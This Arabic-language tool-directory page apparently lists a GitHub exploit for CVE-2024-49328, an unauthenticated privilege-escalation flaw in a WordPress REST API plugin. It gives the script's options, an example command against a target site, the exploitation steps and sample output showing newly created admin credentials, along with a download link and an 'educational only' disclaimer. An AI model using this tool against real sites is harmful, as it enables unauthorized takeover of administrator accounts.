Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-49328-exploit — سكربت بايثون لاستغلال ثغرة تصعيد الامتيازات في إضافة WP REST API FNS الخاصة بـ WordPress، مما يتيح إنشاء حسابات مسؤول دون مصادقة. | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-49328-exploit
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2024-49328-exploit

CVE-2024-49328-exploit

سكربت بايثون لاستغلال ثغرة تصعيد الامتيازات في إضافة WP REST API FNS الخاصة بـ WordPress، مما يتيح إنشاء حسابات مسؤول دون مصادقة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

CVE-2024-49328-exploit

🌟 الوصف:

يستغل هذا البرنامج النصي ثغرة تصعيد الامتيازات في إضافة WP REST API FNS الخاصة بووردبريس. تؤثر الثغرة على جميع الإصدارات حتى 1.0.0 وما يتضمنه، مما يسمح للمهاجمين غير المصادق عليهم بالحصول على صلاحيات المسؤول.

⚙️ الاستخدام

root@kitploit:~


options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site
  -e NEWEMAIL, --Newemail NEWEMAIL New email to register
  -p PASSWORD, --password PASSWORD Password for the new user
                        

مثال على الأمر:

root@kitploit:~
python CVE-2024-49328.py -u http://targetsite.com -e [email protected] -p password123

🔍 تفاصيل الاستغلال

الخطوةالوصفالأيقونة
الخطوة 1تحقق من إصدار الإضافة.📝
الخطوة 2تحقق مما إذا كان الإصدار قابلًا للاستغلال (1.0.0، أو أقل).✅
الخطوة 3استغل الثغرة وسجّل مستخدمًا إداريًا جديدًا.🔒
الخطوة 4اطبع النتيجة مع بيانات اعتماد المستخدم للتحقق.🎉

➡️ مثال على المخرجات

root@kitploit:~

Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: [email protected]
Password: nxploit

تثبيت الحزم المطلوبة

root@kitploit:~
pip install requests

⚠️ إخلاء المسؤولية

🚨 تحذير:

هذا البرنامج النصي لأغراض تعليمية فقط. الاستخدام غير المصرح به لهذا البرنامج النصي ضد الأنظمة دون إذن صريح غير قانوني وغير أخلاقي.

تنزيل الأداة